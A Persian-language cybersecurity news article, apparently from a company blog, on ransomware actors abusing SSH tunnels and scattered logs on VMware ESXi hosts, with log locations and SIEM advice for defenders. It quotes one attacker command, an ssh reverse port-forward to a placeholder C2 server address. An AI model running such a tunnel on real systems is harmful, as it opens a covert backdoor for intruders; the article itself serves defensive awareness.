تاریخ: 1403/11/08
گروهی هکر با استفاده از تونل‌های SSH موفق به دسترسی مخفیانه به VMware ESXi شده اند

گروهی هکر با استفاده از تونل‌های SSH موفق به دسترسی مخفیانه به VMware ESXi شده اند

باج‌افزارها از تونل‌سازی SSH و لاگ‌های پراکنده ESXi برای نفوذ به شبکه‌ها سوءاستفاده می‌کنند. روش‌های شناسایی این تهدید را بشناسید.

در دنیای امنیت سایبری، هایپروایزرهای VMware ESXi به یکی از اهداف اصلی مهاجمان باج‌افزاری تبدیل شده‌اند. دلیل این انتخاب روشن است: به گزارش کارشناس شرکت سحاب این دستگاه‌ها، به‌دلیل نقش کلیدی خود در مدیریت ماشین‌های مجازی، به مهاجمان اجازه می‌دهند به شبکه‌های سازمانی نفوذ کرده، داده‌ها را سرقت کرده و کل فعالیت یک کسب‌وکار را فلج کنند. در ادامه اخبار سایبری امروز شرکت سحاب، چگونگی بهره‌برداری از تونل‌های SSH توسط این مهاجمان و نحوه پیشگیری از آن را بررسی خواهیم کرد.


چرا VMware ESXi هدف اصلی است؟

طبق بررسی های کارشناس شرکت سحاب دستگاه‌های VMware ESXi در محیط‌های مجازی اهمیت ویژه‌ای دارند. این دستگاه‌ها می‌توانند چندین ماشین مجازی را روی یک سرور فیزیکی اجرا کنند و بدین ترتیب بهره‌وری و مدیریت منابع سازمان را بهینه کنند.

بااین‌حال، همین اهمیت و تمرکز بر کارایی، موجب شده است که نظارت کافی بر این دستگاه‌ها صورت نگیرد. بسیاری از سازمان‌ها فعالیت‌های مربوط به ESXi را به‌صورت مستمر زیر نظر ندارند و این دقیقاً همان نقطه ضعفی است که مهاجمان باج‌افزاری از آن سوءاستفاده می‌کنند.


چطور مهاجمان از SSH برای نفوذ استفاده می‌کنند؟

یکی از ابزارهای اصلی مهاجمان، سرویس SSH داخلی است که در VMware ESXi تعبیه شده است. این سرویس به مدیران سیستم اجازه می‌دهد از راه دور، دستگاه را از طریق یک شل (Shell) مدیریت کنند.

شرکت امنیت سایبری Sygnia گزارش داده است که مهاجمان باج‌افزاری از این ویژگی برای ایجاد پایداری در سیستم، حرکت جانبی در شبکه و اجرای payloadهای باج‌افزاری استفاده می‌کنند. بسیاری از سازمان‌ها نظارت دقیقی بر فعالیت‌های SSH ندارند، به همین دلیل مهاجمان می‌توانند به‌صورت مخفیانه از این ابزار بهره ببرند.


روش‌های تونل‌سازی مهاجمان

وقتی مهاجمان به دستگاه دسترسی پیدا می‌کنند، ایجاد تونل‌سازی SSH بسیار ساده است. این کار می‌تواند با استفاده از ابزارهای داخلی SSH یا ابزارهای رایج دیگر انجام شود. Sygnia توضیح می‌دهد که با دستور زیر، مهاجمان به‌راحتی می‌توانند یک پورت انتقال به سرور کنترل و فرماندهی (C2) تنظیم کنند:

ssh –fN -R 127.0.0.1:<شماره پورت SOCKS> <نام کاربری>@<آدرس IP سرور C2>

دستگاه‌های ESXi معمولاً پایدار هستند و به‌ندرت به‌طور غیرمنتظره خاموش می‌شوند. به همین دلیل، تونل ایجادشده می‌تواند به‌عنوان یک درب پشتی نیمه‌پایدار عمل کند و دسترسی طولانی‌مدتی برای مهاجمان فراهم کند.


چالش‌های نظارت بر لاگ‌های ESXi

یکی از نقاط ضعف بزرگ در امنیت ESXi، نحوه ثبت و ذخیره لاگ‌هاست. برخلاف بیشتر سیستم‌ها که تمام لاگ‌ها را در یک فایل syslog واحد ذخیره می‌کنند، ESXi اطلاعات را در چندین فایل جداگانه توزیع می‌کند.

برای شناسایی فعالیت‌های مشکوک، مدیران سیستم باید این چهار فایل را بررسی کنند:

  • /var/log/shell.log: ثبت دستورات اجرا شده در شل ESXi
  • /var/log/hostd.log: ثبت فعالیت‌های مدیریتی و احراز هویت کاربران
  • /var/log/auth.log: ثبت تلاش‌های ورود و رویدادهای احراز هویت
  • /var/log/vobd.log: ذخیره لاگ‌های رویدادهای سیستمی و امنیتی

این لاگ‌ها ممکن است شامل ردپاهایی از تغییرات قوانین فایروال باشند که برای ایجاد دسترسی SSH پایدار ضروری است.


چالش‌های پاک‌سازی لاگ‌ها توسط مهاجمان

باید توجه داشت که مهاجمان معمولاً لاگ‌ها را پاک می‌کنند یا آن‌ها را تغییر می‌دهند تا ردپای خود را مخفی کنند. آن‌ها ممکن است تاریخ‌ها را تغییر دهند یا لاگ‌ها را کوتاه کنند تا شناسایی فعالیت‌های غیرعادی برای محققان دشوار شود.


راهکارهای پیشنهادی برای افزایش امنیت

برای جلوگیری از سوءاستفاده از دستگاه‌های ESXi، سازمان‌ها باید لاگ‌ها را متمرکز کرده و از طریق ارسال به syslog به یک سیستم مدیریت اطلاعات و رویداد امنیتی (SIEM) منتقل کنند. این سیستم‌ها می‌توانند ناهنجاری‌ها را شناسایی کرده و از نفوذ مهاجمان جلوگیری کنند.

مطالب مرتبط  :

هشدار! کپچای جعلی تلگرام سیستم‌تان را آلوده می‌کند | راه‌های جلوگیری از حملات سایبری

راه‌حل جدید گوگل برای مقابله با افزونه‌های مخرب در محیط‌های سازمانی

هکرها به ۱۵,۰۰۰ دستگاه FortiGate متصل شده و تنظیمات و اعتبارنامه های VPN را افشا کردند. 


نتیجه‌گیری

دستگاه‌های VMware ESXi با وجود اهمیت بالایی که در زیرساخت‌های سازمانی دارند، می‌توانند به نقطه ضعفی برای نفوذ مهاجمان تبدیل شوند. بهره‌برداری از تونل‌های SSH یکی از روش‌های محبوب مهاجمان است که به‌دلیل نبود نظارت کافی، امکان دسترسی طولانی‌مدت به شبکه‌های سازمانی را فراهم می‌کند. با نظارت دقیق‌تر بر لاگ‌ها و استفاده از ابزارهای امنیتی پیشرفته، سازمان‌ها می‌توانند خطر این نوع حملات را به حداقل برسانند.

به نظر شما مهم‌ترین راهکار برای شناسایی و جلوگیری از سوءاستفاده مهاجمان از تونل‌های SSH در دستگاه‌های ESXi چیست؟ تجربیات خود را با ما به اشتراک بگذارید!

برای مطالعه بیشتر به BleepingComputer مراجعه بفرمایید

*
*




گروه مهندسی سحاب - برنامه نویسی - برنامه نویس فول استک مدیریت شارژ ماهانه ساختمان شارژانه وبسایت شخصی سید محمد جواد سجادی - برنامه نویس - برنامه نویس فول استک - javad sajadi programmer developer, sajadi developer, جواد سامانه جامع خدمات مادر و کودک دایه و مشاوره در حوزه های ازدواج و فرزند آوری, دایه,سامانه جامع مادر و کودک دایه,مشاوره مادر و کودک,مقالات بارداری,کمک به مادر,هفته های بارداری گالری دوربین قدیمی,گالری ظروف قدیمی,گالری سکه و اسکناس و تمبر,گالری چراغ قدیمی,تلوزیون قدیمی,ظروف چینی سنتی,چراغ نفتی,گالری ریحان , لوازم سنتی , کلکسیونی , عتیقه مشاوره اسلامی کودک و نوجوان, موسسه اخلاق و تربیت, مشاوره اسلامی,روانشناسی اسلامی,مشاوره کودک و نوجوان,مشاوره کودک,مشاوره نوجوان,مشاوره آنلاین,تربیت دينی,تربیت اخلاقی و جنسی,اختلالات رفتاری,مهارت های مادرانه,مسائل نوجوانان